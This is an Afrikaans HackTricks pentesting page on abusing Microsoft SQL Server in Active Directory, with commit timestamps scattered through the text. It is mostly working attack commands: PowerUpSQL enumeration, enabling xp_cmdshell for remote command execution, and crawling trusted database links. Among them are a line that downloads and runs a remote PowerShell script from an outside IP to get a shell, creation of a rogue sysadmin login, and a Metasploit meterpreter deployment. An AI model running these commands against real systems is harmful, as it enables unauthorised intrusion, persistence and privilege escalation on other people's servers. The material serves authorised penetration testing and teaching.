2024-02-11 02:07:06 +00:00
# MSSQL AD Misbruik
2022-04-28 16:01:33 +00:00
< details >
2024-03-26 19:23:39 +00:00
< summary > < strong > Leer AWS hak vanaf nul tot held met< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-03-26 19:23:39 +00:00
* Werk jy by 'n **cybersecurity maatskappy** ? Wil jy jou **maatskappy geadverteer sien in HackTricks** ? of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat** ? Kyk na die [**INSKRYWINGSPLANNE** ](https://github.com/sponsors/carlospolop )!
* Ontdek [**Die PEASS Familie** ](https://opensea.io/collection/the-peass-family ), ons versameling eksklusiewe [**NFTs** ](https://opensea.io/collection/the-peass-family )
2024-02-11 02:07:06 +00:00
* Kry die [**amptelike PEASS & HackTricks swag** ](https://peass.creator-spring.com )
2024-04-07 05:33:57 +00:00
* **Sluit aan by die** [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Discord groep** ](https://discord.gg/hRep4RUj7f ) of die [**telegram groep** ](https://t.me/peass ) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Deel jou haktruuks deur PRs in te dien by die** [**hacktricks repo** ](https://github.com/carlospolop/hacktricks ) **en** [**hacktricks-cloud repo** ](https://github.com/carlospolop/hacktricks-cloud ).
2022-04-28 16:01:33 +00:00
< / details >
2024-03-26 19:23:39 +00:00
## **MSSQL Opname / Ontdekking**
2020-07-15 15:43:14 +00:00
2024-04-07 05:33:57 +00:00
Die powershell-module [PowerUpSQL ](https://github.com/NetSPI/PowerUpSQL ) is baie nuttig in hierdie geval.
2022-08-15 13:00:19 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Import-Module .\PowerupSQL.psd1
2022-08-15 13:00:19 +00:00
```
2024-03-26 19:23:39 +00:00
### Enumereer van die netwerk sonder 'n domein-sessie
2022-08-15 13:00:19 +00:00
```powershell
# Get local MSSQL instance (if any)
2020-07-15 15:43:14 +00:00
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo
#If you don't have a AD account, you can try to find MSSQL scanning via UDP
#First, you will need a list of hosts to scan
Get-Content c:\temp\computers.txt | Get-SQLInstanceScanUDP – –
#If you have some valid credentials and you have discovered valid MSSQL hosts you can try to login into them
#The discovered MSSQL servers must be on the file: C:\temp\instances.txt
Get-SQLInstanceFile -FilePath C:\temp\instances.txt | Get-SQLConnectionTest -Verbose -Username test -Password test
2022-08-15 13:00:19 +00:00
```
2024-04-07 05:33:57 +00:00
### Enumereer van binne die domein
2022-08-15 13:00:19 +00:00
```powershell
# Get local MSSQL instance (if any)
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo
2020-07-15 15:43:14 +00:00
#Get info about valid MSQL instances running in domain
#This looks for SPNs that starts with MSSQL (not always is a MSSQL running instance)
2024-02-11 02:07:06 +00:00
Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose
2020-07-15 15:43:14 +00:00
#Test connections with each one
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -verbose
#Try to connect and obtain info from each MSSQL server (also useful to check conectivity)
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
2022-08-15 13:00:19 +00:00
# Get DBs, test connections and get info in oneliner
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo
```
2024-02-11 02:07:06 +00:00
## MSSQL Basiese Misbruik
2022-08-15 13:00:19 +00:00
2024-02-11 02:07:06 +00:00
### Toegang tot DB
2022-08-15 13:00:19 +00:00
```powershell
#Perform a SQL query
Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select @@servername"
2020-07-15 15:43:14 +00:00
#Dump an instance (a lotof CVSs generated in current dir)
Invoke-SQLDumpInfo -Verbose -Instance "dcorp-mssql"
2022-08-18 23:47:45 +00:00
# Search keywords in columns trying to access the MSSQL DBs
## This won't use trusted SQL links
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLColumnSampleDataThreaded -Keywords "password" -SampleSize 5 | select instance, database, column, sample | ft -autosize
2022-08-15 13:00:19 +00:00
```
### MSSQL RCE
2024-04-07 05:33:57 +00:00
Dit mag ook moontlik wees om **bevele** binne die MSSQL-gashuis uit te voer
2022-08-15 13:00:19 +00:00
```powershell
2022-10-08 08:36:40 +00:00
Invoke-SQLOSCmd -Instance "srv.sub.domain.local,1433" -Command "whoami" -RawResults
2022-08-15 13:00:19 +00:00
# Invoke-SQLOSCmd automatically checks if xp_cmdshell is enable and enables it if necessary
```
2024-04-07 05:33:57 +00:00
### MSSQL Basiese Haktruuks
2022-08-15 13:00:19 +00:00
2022-10-09 17:44:56 +00:00
{% content-ref url="../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/" %}
[pentesting-mssql-microsoft-sql-server ](../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/ )
2022-08-15 13:00:19 +00:00
{% endcontent-ref %}
2024-02-11 02:07:06 +00:00
## MSSQL Vertroue Skakels
2020-07-15 15:43:14 +00:00
2024-04-07 05:33:57 +00:00
As 'n MSSQL-instantie vertrou word (databasis skakel) deur 'n ander MSSQL-instantie. As die gebruiker voorregte het oor die vertroue databasis, sal hy in staat wees om **die vertrouensverhouding te gebruik om ook navrae in die ander instantie uit te voer** . Hierdie vertrouensverhoudings kan geketting word en op 'n bepaalde punt mag die gebruiker 'n sleg gekonfigureerde databasis vind waar hy bevele kan uitvoer.
2022-08-15 13:00:19 +00:00
2024-04-07 05:33:57 +00:00
**Die skakels tussen databasisse werk selfs oor bosvertrouens heen.**
2022-08-15 13:00:19 +00:00
2024-02-11 02:07:06 +00:00
### Powershell Misbruik
2022-08-15 13:00:19 +00:00
```powershell
2020-07-15 15:43:14 +00:00
#Look for MSSQL links of an accessible instance
Get-SQLServerLink -Instance dcorp-mssql -Verbose #Check for DatabaseLinkd > 0
2022-12-20 14:18:39 +00:00
#Crawl trusted links, starting from the given one (the user being used by the MSSQL instance is also specified)
2020-07-15 15:43:14 +00:00
Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Verbose
2021-01-03 00:43:09 +00:00
#If you are sysadmin in some trusted link you can enable xp_cmdshell with:
Get-SQLServerLinkCrawl -instance "< INSTANCE1 > " -verbose -Query 'EXECUTE(''sp_configure ''''xp_cmdshell'''',1;reconfigure;'') AT "< INSTANCE2 > "'
2020-07-15 15:43:14 +00:00
#Execute a query in all linked instances (try to execute commands), output should be in CustomQuery field
Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Query "exec master..xp_cmdshell 'whoami'"
#Obtain a shell
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1'')"'
#Check for possible vulnerabilities on an instance where you have access
Invoke-SQLAudit -Verbose -Instance "dcorp-mssql.dollarcorp.moneycorp.local"
#Try to escalate privileges on an instance
Invoke-SQLEscalatePriv – –
2022-08-18 23:47:45 +00:00
#Manual trusted link queery
Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select * from openquery(""sql2.domain.io"", 'select * from information_schema.tables')"
2022-09-04 09:37:14 +00:00
## Enable xp_cmdshell and check it
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'SELECT * FROM OPENQUERY("sql2.domain.io", ''SELECT * FROM sys.configurations WHERE name = ''''xp_cmdshell'''''');'
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''show advanced options'''', 1; reconfigure;'') AT [sql.rto.external]'
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''xp_cmdshell'''', 1; reconfigure;'') AT [sql.rto.external]'
## If you see the results of @@selectname, it worked
Get-SQLQuery -Instance "sql.rto.local,1433" -Query 'SELECT * FROM OPENQUERY("sql.rto.external", ''select @@servername; exec xp_cmdshell ''''powershell whoami'''''');'
2020-07-15 15:43:14 +00:00
```
2022-07-28 09:46:19 +00:00
### Metasploit
2020-07-15 15:43:14 +00:00
2024-03-26 19:23:39 +00:00
Jy kan maklik vir vertroude skakels kyk met Metasploit.
2020-07-15 15:43:14 +00:00
```bash
#Set username, password, windows auth (if using AD), IP...
msf> use exploit/windows/mssql/mssql_linkcrawler
[msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter session
```
2024-03-26 19:23:39 +00:00
Merk op dat metasploit sal probeer om slegs die `openquery()` -funksie in MSSQL te misbruik (dus, as jy nie 'n bevel met `openquery()` kan uitvoer nie, sal jy die `EXECUTE` -metode **handmatig** moet probeer om bevele uit te voer, sien meer hieronder.)
2020-07-15 15:43:14 +00:00
2024-02-11 02:07:06 +00:00
### Handmatig - Openquery()
2020-07-15 15:43:14 +00:00
2024-04-07 05:33:57 +00:00
Vanaf **Linux** kan jy 'n MSSQL-konsole-skul met **sqsh** en **mssqlclient.py** verkry.
2020-07-15 15:43:14 +00:00
2024-03-26 19:23:39 +00:00
Vanaf **Windows** kan jy ook die skakels vind en bevele handmatig uitvoer met 'n **MSSQL-klient soos** [**HeidiSQL** ](https://www.heidisql.com )
2020-07-15 15:43:14 +00:00
2024-04-07 05:33:57 +00:00
_Aanmelding met Windows-outentifisering:_
2020-07-15 15:43:14 +00:00
2024-04-07 05:33:57 +00:00
 . png > )
2020-07-15 15:43:14 +00:00
2024-04-07 05:33:57 +00:00
#### Betroubare Skakels vind
2022-08-15 13:00:19 +00:00
```sql
2024-03-26 19:23:39 +00:00
select * from master..sysservers;
EXEC sp_linkedservers;
2022-08-15 13:00:19 +00:00
```
2024-04-07 05:33:57 +00:00
 . png > )
2020-07-15 15:43:14 +00:00
2024-02-11 02:07:06 +00:00
#### Voer navrae uit in 'n betroubare skakel
2022-08-15 13:00:19 +00:00
2024-03-26 19:23:39 +00:00
Voer navrae uit deur die skakel (voorbeeld: vind meer skakels in die nuut toeganklike instansie):
2022-08-15 13:00:19 +00:00
```sql
select * from openquery("dcorp-sql1", 'select * from master..sysservers')
```
{% hint style="warning" %}
2024-04-07 05:33:57 +00:00
Kontroleer waar dubbelpunt en enkelkwotasies gebruik word, dit is belangrik om hulle op daardie manier te gebruik.
2022-08-15 13:00:19 +00:00
{% endhint %}
2020-07-15 15:43:14 +00:00
2024-04-07 05:33:57 +00:00
 . png > )
2020-07-15 15:43:14 +00:00
2024-04-07 05:33:57 +00:00
Jy kan hierdie vertroude skakelsketting vir ewig voortsit deur dit handmatig te doen.
2022-08-15 13:00:19 +00:00
```sql
# First level RCE
SELECT * FROM OPENQUERY("< computer > ", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc blah''')
# Second level RCE
SELECT * FROM OPENQUERY("<computer1>", 'select * from openquery("< computer2 > ", ''select @@servername; exec xp_cmdshell ''''powershell -enc blah'''''')')
```
2024-03-26 19:23:39 +00:00
### Handleiding - UITVOER
2020-07-15 15:43:14 +00:00
2024-04-07 05:33:57 +00:00
Jy kan ook vertroue skakels misbruik deur `UITVOER` te gebruik:
2020-07-15 15:43:14 +00:00
```bash
#Create user and give admin privileges
EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
```
2024-03-26 19:23:39 +00:00
## Plaaslike Voorregverhoging
2022-08-15 13:00:19 +00:00
2024-04-07 05:33:57 +00:00
Die **MSSQL plaaslike gebruiker** het gewoonlik 'n spesiale tipe voorreg genaamd ** `SeImpersonatePrivilege` **. Dit laat die rekening toe om "op te tree as 'n klient na verifikasie".
2022-08-15 13:00:19 +00:00
2024-04-07 05:33:57 +00:00
'n Strategie wat baie skrywers mee vore gekom het, is om 'n STELSELDIENS te dwing om te verifieer by 'n bedrieglike of man-in-die-middel-diens wat die aanvaller skep. Hierdie bedrieglike diens kan dan die STELSELDIENS naboots terwyl dit probeer verifieer.
2022-08-15 13:00:19 +00:00
2024-03-26 19:23:39 +00:00
[SweetPotato ](https://github.com/CCob/SweetPotato ) het 'n versameling van hierdie verskeie tegnieke wat uitgevoer kan word via Beacon se `execute-assembly` bevel.
